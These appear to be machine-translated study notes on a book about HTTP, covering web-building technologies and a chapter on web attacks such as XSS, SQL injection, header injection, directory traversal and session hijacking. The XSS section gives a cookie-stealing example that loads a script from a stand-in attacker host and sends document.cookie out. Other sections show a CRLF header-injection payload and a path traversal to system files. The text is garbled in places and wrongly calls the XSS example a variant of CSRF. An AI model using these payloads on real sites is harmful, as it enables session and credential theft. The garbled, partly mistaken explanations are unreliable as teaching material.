"Graphic http" 10, Chapter 11: Web-building technology, Web attack technology

10.2 Dynamic HTML

The dynamic transformation of Web pages is realized by invoking the client-side scripting language JS. Use the DOM Document Object model to specify what elements you want to change.

10.22 Easier to control DOM

Use the DOM to manipulate elements within HTML as objects.

10.3 Web Apps 10.31 Web apps that provide functionality through the Web.

10.32 CGI with Web server collaboration

Common Gateway Interface Gateways: A set of mechanisms that the server forwards to a program after it receives a request from the client.

10.4 Data release format, language 10.41 XML (extensible Markup Language) Extensible Markup Language

The data is recorded in a special way, and it is more suitable for recording structure.

Reading data from an XML document is simpler than HTML.

Since the structure of XML is basically a tree structure with tag segmentation, it is easier to read the data by parsing the parsing function of the parser and extracting the data elements.

10.43 JavaScript-derived lightweight JSON

JavaScript Object Notation.

A lightweight data markup language based on JS's object notation.

11 attack technology 11.12 can tamper with the request at the client

Load the attack code inside the request message:

Through URL query fields or forms, HTTP headers, cookies and other ways to pass the attack code, if there is a security vulnerability, internal information will be stolen, or by the attacker to get management.

11.13 attack patterns for Web apps

• Active attack: Attacks against resources on the server. SQL injection attacks, OS command injection attacks.
• Passive attack: Use the Snare Zhou Enlai to execute the attack code. XSS Cross-site scripting attack. Cross-site request forgery.

1. By convincing the user to trigger a set-up trap, the trap initiates an HTTP request that sends an already embedded attack code.
2. After the move, the browser or mail client will trigger this trap.
3. The browser sends a request with the attack code to the Web app that is the target of the attack and runs the attack code.
4. After execution of the attack code, a security vulnerability of the Web application will become an attacker's springboard, resulting in the user's cookie and other information is stolen, the user's rights in the login state has been malicious abuse and so on.

11.2 Security vulnerabilities due to output value not fully triggered

Client-side validation:

The main use of JavaScript for simple validation, auxiliary authentication, to improve user interaction behavior experience. Because JS can be closed by the user, so do not play a role in security protection.

Web server-side validation:

• input Value Validation: The attack code may be entered, so it is necessary to check compliance with business logic (character encoding, numeric value)
• Output value to the meaning: the output value of the processing is an important security policy.

11.21 Cross-site scripting attacks

Attackers use pre-set traps to trigger passive attacks, which can be seen in previous blogs (full stack case)

Perform JavaScript actions by adding <script>, or plug in other tags.

Example: Stealing a cookie:

<script src= ' http://hackr.jp/xss.js ' ></script>

The purpose of this line of code: The JS file inside the code loaded into the page used. The src attribute specifies the URL of an additional script file.

JS file content:

var content = encodeURI (document.cookie);

document.write ("

document.write (content);

document.write (">");

The first line above gets the cookie information, then the last 3 lines form a

Hackers can add a comment to the script to the current page, because there is no real picture, so there is a broken picture icon.

When a user accesses this page with a vulnerability, a script that executes the, tag SRC is a request with the current cookie information and will go to the attacker's website. This cookie is recorded in the log of the attacker's website.

Summarize:

This is a cross-site forgery request attack Cross-site requests forgery,variant of XSS.

CSRF is an attack method that compelling a user to perform a non-intended operation on a currently logged-on Web application.

11.22 SQL Injection attack

Web applications typically use databases, such as retrieving data.

A hacker with a good command of SQL syntax uses this to add a SQL half statement that causes deletion or some purpose in the search box, after clicking the Confirm button,

Can be combined with built-in SQL syntax to form destructive SQL syntax.

Note: It is common to use the - -tag, which means that the following code is all commented.

In rails, you can use a WHERE clause to avoid it in a special notation.

Example: Booktbi.where ("author =?", "xxx"), so the database will know that Ueno Xuan '-- in the ' semicolon is just plain code, does not play the role of the semicolon itself.

11.23 OS Command injection attack

Execute an illegal operating system command through a Web application to achieve the purpose of the attack.

There is a risk where the shell function can be called.

11.24 HTTP Header injection attack HTTP headers injection

Add an attack that arbitrarily responds to the header or body by inserting a newline within the header field of the response. (Passive attack)

• Set any cookie information
• Redirect to any URL
• Show arbitrary body: HTTP response truncation attack HTTP Response splitting Attack

Example: Header injection attack

%0d%0a This is the line break symbol.

So the Set-cookie header is forced to increase.

When a cookie is set, an attacker can disguise the user.

This is the first injection attack, inserting any of the header fields.

HTTP response truncation attack

One of the first injection attacks, in the same order as the attack, but to send two %0d%0a%%0d%0a after inserting a string.

Use two successive lines of line to make the HTTP header and the body separated by the blank line, so that the subject can be forged to achieve the purpose of the attack.

??, <! --this is a comment.

11.25 Message Header Injection attack

11.26 Directory traversal attacks traversal directories

An attack that accesses an attacker by illegally truncating its directory path.

Use the .../ etc relative path to locate on an absolute path such as/etc/passed/, causing the file on the server to be accessed.

Then the hacker casually browse, tamper with, delete the content on the server pull, aha hahaha.

You should turn off the ability to specify access to any file name.

11.4 Session security vulnerability 11.41 sessions hijack conversation hijacking

• Guessing sessions through informal generation methods??
• Steal session ID () via eavesdropping or XSS attack
• Force get session ID through session fixation

Get the user's session ID by some means and disguise it as a user/

11.5 Other security vulnerability 11.51 password cracking

Hack the encrypted password:

Because the password does hash function processing or adding salt.

11.52 Click Hijack

Use transparent buttons or links to trap, overlay on Web pages, and entice users to click on which link without their knowledge.

Also called interface camouflage.

Other security vulnerabilities:

Dos attacks, backdoor procedures.

"Graphic http" 10, Chapter 11: Web-building technology, Web attack technology